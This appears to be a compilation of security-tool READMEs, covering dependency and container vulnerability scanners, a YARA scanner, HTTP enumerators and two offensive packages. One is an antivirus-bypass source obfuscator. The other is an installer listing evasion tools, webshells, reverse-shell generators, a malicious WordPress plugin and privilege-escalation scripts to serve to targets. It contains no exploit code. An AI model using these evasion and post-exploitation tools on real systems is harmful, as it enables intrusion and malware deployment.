Anchore Engine is also the OSS foundation for Anchore Enterprise, which adds a graphical UI (providing policy management, user management, a summary dashboard, security and policy evaluation reports, and many other graphical client controls), and other back-end features and modules.
Supported Operating Systems
  • Alpine
  • Amazon Linux 2
  • CentOS
  • Debian
  • Google Distroless
  • Oracle Linux
  • Red Hat Enterprise Linux
  • Red Hat Universal Base Image (UBI)
  • Ubuntu
Supported Packages
  • GEM
  • Java Archive (jar, war, ear)
  • NPM
  • Python (PIP)

Installation
There are several ways to get started with Anchore Engine. For the latest information on quickstart and full production installation with docker-compose, Helm, and other methods, please visit the Anchore Documentation.
The Anchore Engine is distributed as a Docker Image available from DockerHub.

Quick Start (TLDR)
See documentation for the full quickstart guide.
To quickly bring up an installation of Anchore Engine on a system with docker (and docker-compose) installed, follow these simple steps:
curl https://docs.anchore.com/current/docs/engine/quickstart/docker-compose.yaml > docker-compose.yaml
docker-compose up -d
Once the Engine is up and running, you can begin to interact with the system using the CLI.

Getting Started using the CLI
The Anchore CLI is an easy way to control and interact with the Anchore Engine.
The Anchore CLI can be installed using the Python pip command, or by running the CLI from the Anchore Engine CLI container image. See the Anchore CLI project on Github for code and more installation options and usage.

CLI Quick Start (TLDR)
By default, the Anchore CLI tries to connect to the Anchore Engine at http://localhost:8228/v1 with no authentication. The username, password, and URL for the server can be passed to the Anchore CLI as command-line arguments:
--u   TEXT   Username      e.g. admin
--p   TEXT   Password      e.g. foobar
--url TEXT   Service URL   e.g. http://localhost:8228/v1
Rather than passing these parameters for every call to the tool, they can also be set as environment variables:
ANCHORE_CLI_URL=http://myserver.example.com:8228/v1
ANCHORE_CLI_USER=admin
ANCHORE_CLI_PASS=foobar
Add an image to the Anchore Engine:
anchore-cli image add docker.io/library/debian:latest
Wait for the image to move to the 'analyzed' state:
anchore-cli image wait docker.io/library/debian:latest
List images analyzed by the Anchore Engine:
anchore-cli image list
Get image overview and summary information:
anchore-cli image get docker.io/library/debian:latest
List feeds and wait for at least one vulnerability data feed sync to complete. The first sync can take some time (20-30 minutes); after that, syncs will only merge deltas.
anchore-cli system feeds list
anchore-cli system wait
Obtain the results of the vulnerability scan on an image:
anchore-cli image vuln docker.io/library/debian:latest os
List operating system packages present in an image:
anchore-cli image content docker.io/library/debian:latest os
Perform a policy evaluation against an image using the default policy:
anchore-cli evaluate check docker.io/library/debian:latest
View other available policies from the Anchore Policy Hub
anchore-cli policy hub --help
anchore-cli policy hub list

API
For the external API definition (the user-facing service), see the External API Swagger Spec. If you have Anchore Engine running, you can also review the Swagger by directing your browser at http://<servicehost>:8228/v1/ui/ (NOTE: the trailing slash is required for the embedded swagger UI browser to be viewed properly).
Each service implements its own API, and all APIs are defined in Swagger/OpenAPI spec. You can find each in the anchore_engine/services/<servicename>/api/swagger directory.

More Information
For further details on the use of the Anchore CLI with the Anchore Engine, please refer to the Anchore Engine Documentation


Safety - Check Your Installed Dependencies For Known Security Vulnerabilities



Safety checks your installed dependencies for known security vulnerabilities.
By default it uses the open Python vulnerability database Safety DB, but can be upgraded to use pyup.io's Safety API using the --key option.

Installation
Install safety with pip. Keep in mind that we support only Python 3.5 and up. Look at the Python 2.7 section at the end of this document.
pip install safety

Usage
To check your currently selected virtual environment for dependencies with known security vulnerabilities, run:
safety check
You should get a report similar to this:
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+==============================================================================+
| No known security vulnerabilities found. |
+==============================================================================+
Now, let's install something insecure:
pip install insecure-package
Yeah, you can really install that.
Run safety check again:
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+==========================+===============+===================+===============+
| package | installed | affected | source |
+==========================+===============+===================+===============+
| insecure-package | 0.1.0 | <0.2.0 | changelog |
+==========================+===============+===================+===============+

Examples

Read requirement files
Just like pip, Safety is able to read local requirement files:
safety check -r requirements.txt

Read from stdin
Safety is also able to read from stdin with the --stdin flag set.
To check a local requirements file, run:
cat requirements.txt | safety check --stdin
or the output of pip freeze:
pip freeze | safety check --stdin
or to check a single package:
echo "insecure-package==0.1" | safety check --stdin
For more examples, take a look at the options section.

Using Safety in Docker
Safety can easily be executed as a Docker container. It can be used just as described in the examples section.
echo "insecure-package==0.1" | docker run -i --rm pyupio/safety safety check --stdin
cat requirements.txt | docker run -i --rm pyupio/safety safety check --stdin

Using the Safety binaries
The Safety binaries provide some extra security.
After installation, they can be used just like the regular command line version of Safety.

Using Safety with a CI service
Safety works great in your CI pipeline. It returns a non-zero exit status if it finds a vulnerability.
Run it before or after your tests. If Safety finds something, your tests will fail.
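Since only the exit status matters, wiring Safety into any custom runner is simple; a minimal sketch:
import subprocess
import sys

# safety exits non-zero when vulnerabilities are found
if subprocess.run(["safety", "check"]).returncode != 0:
    sys.exit("vulnerable dependencies found, failing the build")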
Travis
install:
- pip install safety

script:
- safety check
Gitlab CI
safety:
script:
- pip install safety
- safety check
Tox
[tox]
envlist = py37

[testenv]
deps =
safety
pytest
commands =
safety check
pytest
Deep GitHub Integration
If you are looking for a deep integration with your GitHub repositories: Safety is available as a part of pyup.io, called Safety CI. Safety CI checks your commits and pull requests for dependencies with known security vulnerabilities and displays a status on GitHub.


Using Safety in production
Safety is free and open source (MIT Licensed). The underlying open vulnerability database is updated once per month.
To get access to all vulnerabilities as soon as they are added, you need a Safety API key that comes with a paid pyup.io account, starting at $99 for organizations.

Options

--key
API Key for pyup.io's vulnerability database. Can be set as SAFETY_API_KEY environment variable.
Example
safety check --key=12345-ABCDEFGH

--db
Path to a directory with a local vulnerability database including insecure.json and insecure_full.json
Example
safety check --db=/home/safety-db/data

--proxy-host
Proxy host IP or DNS

--proxy-port
Proxy port number

--proxy-protocol
Proxy protocol (https or http)

--json
Output vulnerabilities in JSON format.
Example
safety check --json
[
[
"django",
"<1.2.2",
"1.2",
"Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via a csrfmiddlewaretoken (aka csrf_token) cookie.",
"25701"
]
]
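Each entry is a flat list of package, affected version spec, installed version, description, and vulnerability ID, so post-processing the report is straightforward; a minimal sketch:
import json
import subprocess

out = subprocess.run(["safety", "check", "--json"],
                     capture_output=True, text=True).stdout
for package, affected, installed, description, vuln_id in json.loads(out):
    print("%s %s (affected: %s) -> ID %s"
          % (package, installed, affected, vuln_id))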

--full-report
Full reports include a security advisory (if available).
Example
safety check --full-report
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+============================+===========+==========================+==========+
| package | installed | affected | ID |
+============================+===========+==========================+==========+
| django | 1.2 | <1.2.2 | 25701 |
+==============================================================================+
| Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows |
| remote attackers to inject arbitrary web script or HTML via a csrfmiddlewar |
| etoken (aka csrf_token) cookie. |
+==============================================================================+

--bare
Output vulnerable packages only. Useful in combination with other tools.
Example
safety check --bare
cryptography django

--cache
Cache requests to the vulnerability database locally for 2 hours.
Example
safety check --cache

--stdin
Read input from stdin.
Example
cat requirements.txt | safety check --stdin
pip freeze | safety check --stdin
echo "insecure-package==0.1" | safety check --stdin

--file, -r
Read input from one (or multiple) requirement files.
Example
safety check -r requirements.txt
safety check --file=requirements.txt
safety check -r req_dev.txt -r req_prod.txt

--ignore, -i
Ignore one (or multiple) vulnerabilities by ID
Example
safety check -i 1234
safety check --ignore=1234
safety check -i 1234 -i 4567 -i 89101

--output, -o
Save the report to a file
Example
safety check -o insecure_report.txt
safety check --output --json insecure_report.json

Review
If you save the report in JSON format, you can review it in the report format again.

Options

--file, -f (REQUIRED)
Read an insecure report.
Example
safety review -f insecure.json
safety review --file=insecure.json

--full-report
Full reports include a security advisory (if available).
Example
safety review -r insecure.json --full-report
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+============================+===========+==========================+==========+
| package | installed | affected | ID |
+============================+===========+==========================+==========+
| django | 1.2 | <1.2.2 | 25701 |
+==============================================================================+
| Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows |
| remote attackers to inject arbitrary web script or HTML via a csrfmiddlewar |
| etoken (aka csrf_token) cookie. |
+==============================================================================+

--bare
Output vulnerable packages only.
Example
safety review --file report.json --bare
django

Python 2.7
This tool requires the latest Python patch versions starting with version 3.5. We did support Python 2.7 in the past but, as with other Python versions, it reached its End-Of-Life, and as such we are not able to support it anymore.
We understand you might still have Python 2.7 projects running. At the same time, Safety itself has a commitment to encourage developers to keep their software up-to-date, and it would not make sense for us to work with officially unsupported Python versions, or even those that reached their end of life.
If you still need to run Safety from a Python 2.7 environment, please use version 1.8.7, available on PyPI. Alternatively, you can run Safety from a Python 3 environment to check the requirements file for your Python 2.7 project.


Spyre - Simple YARA-based IOC Scanner


...a simple, self-contained modular host-based IOC scanner
Spyre is a simple host-based IOC scanner built around the YARA pattern matching engine and other scan modules. The main goal of this project is easy operationalization of YARA rules and other indicators of compromise.
Users need to bring their own rule sets. The awesome-yara repository gives a good overview of free yara rule sets out there.
Spyre is intended to be used as an investigation tool by incident responders. It is not meant to evolve into any kind of endpoint protection service.

Overview
Using Spyre is easy:
  1. Add YARA signatures. By default, YARA rules are read from filescan.yar for file scans and from procscan.yar for process memory scans, respectively. The following options exist for providing rule files to Spyre (and will be tried in this order):
    1. Add the rule files to a ZIP file and append that file to the binary (see the sketch after this list).
    2. Add the rule files to a ZIP file named $PROGRAM.zip: if the Spyre binary is called spyre or spyre.exe, use spyre.zip.
    3. Put the rule files into the same directory as the binary.
    ZIP file contents may be encrypted using the password infected (AV industry standard) to prevent antivirus software from mistaking parts of the ruleset as malicious content and preventing the scan.
    YARA rule files may contain include statements.
  2. Deploy, run the scanner
  3. Collect report
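Appending the ruleset ZIP to the binary (option 1 above) is plain byte concatenation, the equivalent of cat spyre spyre.zip > spyre-with-rules on Unix; a minimal sketch, with file names assumed:
import shutil

# ZIP archives are indexed from the end of the file, so readers still
# find the archive even with an executable prepended to it.
with open("spyre-with-rules", "wb") as out:
    for part in ("spyre", "spyre.zip"):
        with open(part, "rb") as f:
            shutil.copyfileobj(f, out)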

Configuration
Run-time options can be passed either via command line parameters or via a file named params.txt. Empty lines and lines starting with the # character are ignored. Every line is interpreted as a single command line argument.
If a ZIP file has been appended to the Spyre binary, configuration and other files such as YARA rules are only read from this ZIP file. Otherwise, they are read from the directory into which the binary has been placed.
Some options allow specifying a list of items. This can be done by separating the items using a semicolon (;).
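For example, a params.txt equivalent to a handful of the options below might look like this (one argument per line; the values are only an illustration):
# scan only these paths
--path=/home;/tmp
--loglevel=info
--report=spyre.log,format=plain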

--high-priority
Normally (unless this switch is enabled), Spyre instructs the OS scheduler to lower the priorities of CPU time and I/O operations, in order to avoid disruption of normal system operation.

--set-hostname=NAME
Explicitly set the hostname that will be used in the log file and in the report. This is usually not needed.

--loglevel=LEVEL
Set the log level. Valid: trace, debug, info, notice, warn, error, quiet.

--report=SPEC
Set one or more report targets, separated by a semicolon (;). Default: spyre.log in the current working directory, using the plain format.
A different output format can be specified by appending ,format=FORMAT. The following formats are currently supported:
  • plain, the default, a simple human-readable text format
  • tsjson, a JSON document that can be imported into Timesketch

--path=PATHLIST
Set one or more specific filesystem paths to scan. Default: / (Unix) or all fixed drives (Windows).

--yara-file-rules=FILELIST
Set list of YARA rule files for scanning files on the system. Default: Use filescan.yar from appended ZIP file, $PROGRAM.ZIP, or current working directory.

--yara-proc-rules=FILELIST
Set list of YARA rule files for scanning processes' memory regions. Default: Use procscan.yar from appended ZIP file, $PROGRAM.ZIP, or current working directory.

--max-file-size=SIZE
Set maximum size for files to be scanned using YARA. Default: 32MB

--ioc-file=FILE

Notes about YARA rules
YARA is configured with default settings, plus the following explicit switches (cf. 3rdparty.mk):
  • --disable-magic
  • --disable-cuckoo
  • --enable-dotnet
  • --enable-macho
  • --enable-dex

Building
Spyre can be built for 32bit and 64bit Linux and Windows targets on a Debian/buster system (or a chroot) in which the following packages have been installed:
  • make
  • gcc
  • gcc-multilib
  • gcc-mingw-w64
  • autoconf
  • automake
  • libtool
  • pkg-config
  • wget
  • patch
  • sed
  • golang-$VERSION-go, e.g. golang-1.8-go. The Makefile will automatically select the newest version unless GOROOT has been set.
  • git-core
  • ca-certificates
  • zip
Once everything has been installed, just type make. This should download archives for musl-libc, OpenSSL, and YARA, build those, and then build spyre.
The bare spyre binaries are created in _build/<triplet>/.
Running make release creates a ZIP file that contains those binaries for all supported architectures.


Avcleaner - C/C++ Source Obfuscator For Antivirus Bypass

$
0
0

C/C++ source obfuscator for antivirus bypass.

Build
docker build . -t avcleaner
docker run -v ~/dev/scrt/avcleaner:/home/toto -it avcleaner bash #adapt ~/dev/scrt/avcleaner to the path where you cloned avcleaner
sudo pacman -Syu
mkdir CMakeBuild && cd CMakeBuild
cmake ..
make -j 2
./avcleaner.bin --help

Usage
For simple programs, this is as easy as:
avcleaner.bin test/strings_simplest.c --strings=true --
However, you should know that you're using a compiler frontend, which can only work well if you give it the path to ALL the includes required to build your project. As an example, test/string_simplest.c includes headers from the WinSDK, and the script run_example.sh shows how to handle such scenarios.

Common errors
CommandLine Error: Option 'non-global-value-max-name-size' registered more than once! LLVM ERROR: inconsistency in registered CommandLine options
In case you encounter this error, please use CMakeLists_archlinux.txt instead of CMakeLists.txt and it should go away.


Monsoon - Fast HTTP Enumerator

A fast HTTP enumerator that allows you to execute a large number of HTTP requests, filter the responses and display them in real-time.

Example
Run an HTTP GET request for each entry in filenames.txt, hide all responses with the status code 403 or 404:
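The original command was shown as a screen capture; based on the description and the fuzz subcommand, the invocation likely resembled the following (flag names assumed):
$ monsoon fuzz --file filenames.txt \
      --hide-status 403,404 \
      https://example.com/FUZZ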


Installation

Building from source
These instructions will get you a compiled version of the code in the master branch.
You'll need a recent version of the Go compiler, at least version 1.11. For Debian, install the package golang-go.
Clone the repository, then from within the checkout run the following command:
$ go build
Afterwards you'll find a monsoon binary in the current directory. It can be cross-compiled for other operating systems as follows:
$ GOOS=windows GOARCH=amd64 go build -o monsoon.exe

Unofficial Packages
For Arch Linux based distributions monsoon is available as an unofficial package on the AUR. Using your AUR helper of choice such as yay:
yay -S monsoon

Getting Help
The program has several subcommands, the most important one is fuzz which contains the main functionality. You can display a list of commands as follows:
$ ./monsoon -h
Usage:
monsoon command [options]

Available Commands:
fuzz Execute and filter HTTP requests
help Help about any command
show Construct and display an HTTP request
test Send an HTTP request to a server and show the result
version Display version information

Options:
-h, --help help for monsoon

Use "monsoon [command] --help" for more information about a command.
For each command, calling it with --help (e.g. monsoon fuzz --help) will display a description of all the options, and calling monsoon help fuzz also shows an extensive list of examples.

Wordlists
The SecLists Project collects wordlists that can be used with monsoon.


MZAP - Multiple Target ZAP Scanning


Multiple target ZAP scanning / mzap is a tool for N*N scanning in ZAP, i.e. driving multiple ZAP instances against multiple targets.

Concept


Installation

go-get
$ go get -u github.com/hahwul/mzap

snapcraft
$ sudo snap install mzap --devmode

homebrew
$ brew tap hahwul/mzap
$ brew install mzap

Usage
Usage:
mzap [command]

Available Commands:
ajaxspider Add AjaxSpider ZAP
ascan Add ActiveScan ZAP
help Help about any command
spider Add ZAP spider
stop Stop Scanning
version Show version

Flags:
--apikey string ZAP API Key / if the apikey is disabled, do not use this option
--apis string ZAP API Host(s) address
e.g --apis http://localhost:8090,http://192.168.0.4:8090 (default "http://localhost:8090")
--config string config file (default is $HOME/.mzap.yaml)
-h, --help help for mzap
--urls string URL list file / e.g --urls hosts.txt
$ mzap spider --urls sample/target.txt
INFO[0000] Start Prefix=/JSON/spider/action/scan/ Size of Target=17
INFO[0000] Added Target="http://testphp.vulnweb.com/" ZAP API="http://localhost:8090"
INFO[0000] Added Target="http://www.hahwul.com" ZAP API="http://localhost:8090"





Some-Tools - Install And Keep Up To Date Some Pentesting Tools


Some-Tools

Why
I was looking for a way to manage and keep up to date some tools that are not included in Kali Linux. For example, I was looking for an easy way to manage privilege escalation scripts. One day I saw sec-tools from eugenekolo (which you can see at the bottom of the page) and it gave me the motivation to start working on mine right away.
But keep in mind that this is different: I built it for people who are working with Kali. It should work on other distros, but I didn't include tools like Burp Suite or SQLmap because they come with Kali by default.

Installation
$ git clone https://github.com/som3canadian/Some-Tools
$ cd Some-Tools
$ ./sometools.sh setup
# after setup, open new terminal or tab
$ ./sometools.sh list
# you can look in your .zshrc or .bashrc if you are not sure that the installation worked.
# For more info see Actions Detailed section.

Familiar with Vagrant ?
See how to install Some-Tools with a brand new Kali 2020.x VM with only 5 commands in the Vagrantfile section.

Actions Summary
  • setup - Set up the environment (Create bin dir and set bin dir to your $PATH)
  • help - Show this menu
  • info - Show README.md of an installed tool
  • list - List all tools (Installed tools will appear in a different color)
  • list-cat - List all tools of a Category (Installed tools will appear in a different color)
  • list-installed - List all installed tools
  • install - Install a tool
  • install-cat - Install all tools of a Category
  • install-all - Install all tools
  • check-update - Check update for an installed tool and update it if you want (Only for tools from a git repo)
  • check-update-all - Check Update for all installed tools
  • self-update - Check Update for Some-Tools and Update if you want
  • add-tool - Create template for a new tool (./sometools.sh add-tool newtoolname category)
  • uninstall - Uninstall a tool (Tries the tool's built-in uninstall.sh before cleaning it from our project)
  • uninstall-cat - Uninstall all tools of a Category
  • complete-uninstall - Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
Note: No need to specify the category name when using a tool. Just use the tool name.

Basic usage
# Initial setup. Should be the first command
$ ./sometools.sh setup
# List all available tools
$ ./sometools.sh list
# List all available tools of a category
$ ./sometools.sh list-cat
# List installed tool(s)
$ ./sometools.sh list-installed
# Install a tool
$ ./sometools.sh install unicorn
# Using ID instead of tool name
$ ./sometools.sh install 4
# Install all tools of a Category
$ ./sometools.sh install-cat PrivEsc-Win
# Install All tools
$ ./sometools.sh install all
# Show README.md of an installed tool
$ ./sometools.sh info unicorn
# Using ID instead of tool name
$ ./sometools.sh info 4
# Check for update
$ ./sometools.sh check-update PEAS
# Using ID instead of tool name
$ ./sometools.sh check-update 9
# Check update for all installed tools
$ ./sometools.sh check-update all
# Add a new tool
$ ./sometools.sh add-tool newtoolname PrivEsc-Lin
# Uninstall a tool
$ ./sometools.sh uninstall unicorn
# Using ID instead of tool name
$ ./sometools.sh uninstall 4
# Uninstall all tools of a Category
$ ./sometools.sh uninstall-cat PrivEsc-Win
# Update some-tools
$ ./sometools.sh self-update
# Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
$ ./sometools.sh complete-uninstall

The Bin directory
  • The bin directory will be created when running the setup action. This is the dir path that will be added to your shell $PATH (../../../Some-Tools/bin). In the bin dir we put copies (symlinks) of tools that we want executable from anywhere on the machine. For example, you may want to run a tool like unicorn.py from any directory.
  • The setup action will also create bin/PrivEsc-Lin and bin/PrivEsc-Win in the process. These directories hold your privilege escalation scripts, so when you want to use them you can fire up a Python HTTP server (see the example after this list) and quickly serve the scripts you desire. The scripts in those folders are updated at the same time you update the tool(s) with the check-update action.
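  For example, to serve the PrivEsc-Lin scripts to a target with Python's built-in HTTP server:
  $ cd bin/PrivEsc-Lin && python3 -m http.server 8000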

Tools List

Summary
$ ./sometools.sh list

# In order, columns are: ID, category name and tool name
[1] Evasion/Bashfuscator
[2] Evasion/PyFuscation
[3] Evasion/tvasion
[4] Evasion/unicorn
[5] Exploit-Win/windows-kernel-exploits
[6] PrivEsc-Lin/BeRoot
[7] PrivEsc-Lin/LinEnum
[8] PrivEsc-Lin/LinPwn
[9] PrivEsc-Lin/PEAS
[10] PrivEsc-Lin/SUID3NUM
[11] PrivEsc-Lin/SetUID
[12] PrivEsc-Lin/linux-enum-mod
[13] PrivEsc-Lin/linux-exploit-suggester
[14] PrivEsc-Lin/linux-exploit-suggester-2
[15] PrivEsc-Lin/linuxprivchecker
[16] PrivEsc-Lin/lse
[17] PrivEsc-Lin/pspy
[18] PrivEsc-Lin/setuid-wrapper
[19] PrivEsc-Lin/unix-privesc-check
[20] PrivEsc-Win/JAWS
[21] PrivEsc-Win/Powerless
[22] PrivEsc-Win/Privesc
[23] PrivEsc-Win/SessionGopher
[24] PrivEsc-Win/Sherlock
[25] PrivEsc-Win/WinPwn
[26] PrivEsc-Win/Windows-Exploit-Suggester
[27] PrivEsc-Win/Windows-Privilege-Escalation
[28] PrivEsc-Win/mimikatz
[29] PrivEsc-Win/windows-privesc-check
[30] Utilities/SirepRAT
[31] Utilities/Windows-Tools
[32] Utilities/chisel
[33] Utilities/cryptz
[34] Utilities/decodify
[35] Utilities/evil-winrm
[36] Utilities/impacket
[37] Utilities/nishang
[38] Utilities/nmapAutomator
[39] Utilities/revshellgen
[40] Web/dirsearch
[41] Web/kadimus
[42] Web/windows-php-reverse-shell
[43] Web/wwwolf-php-webshell
[44] Wordpress/malicious-wordpress-plugin
[45] Wordpress/wordpress-exploit-framework

Detailed
Category | Tool | Source
Evasion | Bashfuscator | https://github.com/Bashfuscator/Bashfuscator
Evasion | PyFuscation | https://github.com/CBHue/PyFuscation
Evasion | tvasion | https://github.com/loadenmb/tvasion
Evasion | unicorn | https://github.com/trustedsec/unicorn
Exploit-Win | windows-kernel-exploits | https://github.com/SecWiki/windows-kernel-exploits
PrivEsc-Lin | BeRoot | https://github.com/AlessandroZ/BeRoot
PrivEsc-Lin | LinEnum | https://github.com/rebootuser/LinEnum
PrivEsc-Lin | LinPwn | https://github.com/3XPL017/LinPwn
PrivEsc-Lin | PEAS | https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
PrivEsc-Lin | SUID3NUM | https://github.com/Anon-Exploiter/SUID3NUM
PrivEsc-Lin | SetUID | https://github.com/AlessandraZullo/SetUID.git
PrivEsc-Lin | linux-enum-mod | https://github.com/kevthehermit/pentest
PrivEsc-Lin | linux-exploit-suggester | https://github.com/mzet-/linux-exploit-suggester
PrivEsc-Lin | linux-exploit-suggester-2 | https://github.com/jondonas/linux-exploit-suggester-2
PrivEsc-Lin | linuxprivchecker | https://github.com/sleventyeleven/linuxprivchecker.git
PrivEsc-Lin | lse | https://github.com/diego-treitos/linux-smart-enumeration
PrivEsc-Lin | pspy | https://github.com/DominicBreuker/pspy
PrivEsc-Lin | setuid-wrapper | https://github.com/jfredrickson/setuid-wrapper
PrivEsc-Lin | unix-privesc-check | https://github.com/pentestmonkey/unix-privesc-check
PrivEsc-Win | JAWS | https://github.com/411Hall/JAWS
PrivEsc-Win | Powerless | https://github.com/M4ximuss/Powerless
PrivEsc-Win | Privesc | https://github.com/enjoiz/Privesc
PrivEsc-Win | SessionGopher | https://github.com/Arvanaghi/SessionGopher
PrivEsc-Win | Sherlock | https://github.com/rasta-mouse/Sherlock
PrivEsc-Win | WinPwn | https://github.com/S3cur3Th1sSh1t/WinPwn
PrivEsc-Win | Windows-Privilege-Escalation | https://github.com/frizb/Windows-Privilege-Escalation
PrivEsc-Win | Windows-Exploit-Suggester | https://github.com/AonCyberLabs/Windows-Exploit-Suggester
PrivEsc-Win | mimikatz | https://github.com/gentilkiwi/mimikatz
PrivEsc-Win | windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check
Utilities | SirepRAT | https://github.com/SafeBreach-Labs/SirepRAT.git
Utilities | Windows-Tools | https://github.com/som3canadian/Windows-Tools.git
Utilities | chisel | https://github.com/jpillora/chisel
Utilities | cryptz | https://github.com/iinc0gnit0/cryptz
Utilities | decodify | https://github.com/s0md3v/Decodify
Utilities | evil-winrm | https://github.com/Hackplayers/evil-winrm
Utilities | impacket | https://github.com/SecureAuthCorp/impacket
Utilities | nishang | https://github.com/samratashok/nishang
Utilities | nmapAutomator | https://github.com/21y4d/nmapAutomator
Utilities | revshellgen | https://github.com/t0thkr1s/revshellgen
Web | dirsearch | https://github.com/maurosoria/dirsearch
Web | Kadimus | https://github.com/P0cL4bs/kadimus
Web | windows-php-reverse-shell | https://github.com/Dhayalanb/windows-php-reverse-shell.git
Web | wwwolf-php-webshell | https://github.com/WhiteWinterWolf/wwwolf-php-webshell
Wordpress | malicious-wordpress-plugin | https://github.com/wetw0rk/malicious-wordpress-plugin.git
Wordpress | wordpress-exploit-framework | https://github.com/rastating/wordpress-exploit-framework
Note:
  • PEAS include both linPEAS and winPEAS scripts
  • BeRoot include both Linux and Windows scripts

Actions Detailed
  • setup (Setup Process):
    • Should be the first command you run.
    • First it will ask whether you use .bashrc or .zshrc (the built-in setup action will not work if you are not using one of those two shells)
    • After that it will set the $SOME_ROOT variable and create a new $PATH
    • After the setup, open new terminal tabs/windows or source your shell file (.bashrc or .zshrc) in the current terminal to activate the new path. To see your new path afterwards, run echo $PATH
    • In your shell file (.bashrc or .zshrc), your original $PATH is copied before the modification is made; it sits commented a few lines before the end of the file. So if you want to reset your path to what it was before the Some-Tools setup, copy the commented command from your shell file, clean up what the setup created in the file and finally source it.
    • Creation of Bin directory. (bin, bin/PrivEsc-Lin and bin/PrivEsc-Win)
    • You can read the setup section in sometools.sh to have a better understanding.
    $ ./sometools.sh setup
  • install and install-all:
    • Install one tool or all tools.
    • If you install only one tool, instead of using the tool name you can use its ID number, shown when you run ./sometools.sh list.
    • When you install a tool, a .installed file is created in the tool dir. This file supports the list-installed action.
    $ ./sometools.sh list # see which tools can be installed
    # install a tool
    $ ./sometools.sh install LinEnum
    # example using an ID number
    $ ./sometools.sh install 7
    # installing all tools
    $ ./sometools.sh install-all
  • install-cat and uninstall-cat:
    • Install all tools of a category.
    • Uninstall all tools of a category.
    # install cat
    $ ./sometools.sh install-cat PrivEsc-Win
    # uninstall cat
    $ ./sometools.sh uninstall-cat PrivEsc-Win
  • check-update and check-update-all:
    • Check update for an installed tool or all installed tools
    • check-update won't update a tool that is not a git repo, so you must manually update tool(s) that don't contain a .git directory.
    • If you check-update only one tool, instead of using the tool name you can use its ID number, shown when you run ./sometools.sh list.
    $ ./sometools.sh list-installed # list currently installed tool(s)
    $ ./sometools.sh check-update LinEnum
    # example using an ID number
    $ ./sometools.sh check-update 7
    # example with check-update-all
    $ ./sometools.sh check-update-all
    • Why two check-git scripts? check-git.sh only tells whether the tool is behind or not. If a newer version is detected, you will be asked to execute check-git-action.sh.
  • self-update:
    • This function helps keep this tool (Some-Tools) up to date. If you are behind, it will ask whether you want to pull.
    $ ./sometools.sh self-update
  • uninstall:
    • Uninstall an installed tool. There is no uninstall-all function; I guess at that point you can just delete the repo.
    • Instead of using the tool name, you can use its ID number, shown when you run ./sometools.sh list.
    $ ./sometools.sh uninstall unicorn
    # example using an ID number
    $ ./sometools.sh uninstall 4
  • add-tool:
    • add-tool will create your new directory in the category you have specified. It will also create 3 files in this directory: install-tool.sh, uninstall-tool.sh and .gitignore.
    • Looking at other tools will help you understand how to add yours. It's quite easy: just 3 files, which the add-tool action creates for you.
    • When adding a tool I strongly suggest naming it the same as its repo; the check-update action will be easier to use afterwards. If you want a different name, see the lse tool in the PrivEsc-Lin directory as an example. You may have to change the .gitignore file in your tool directory.
    • If your tool is not a git repo, no worries, but you will have to modify the install-tool.sh file to fit your needs. If you do so, the check-update action will not work out of the box (because no .git directory will be found). Solution: create a file named update-tool.sh (in the tool directory) and put your update commands in it. The some-tools.sh script detects this file name when the check-update action is used. Don't forget to chmod +x your new file.
    • .gitignore will contain your tool name and .installed. Why? Because we don't want to push a git repo into another repo and we don't want to push the .installed file.
    $ ./sometools.sh add-tool newtoolname PrivEsc-Lin
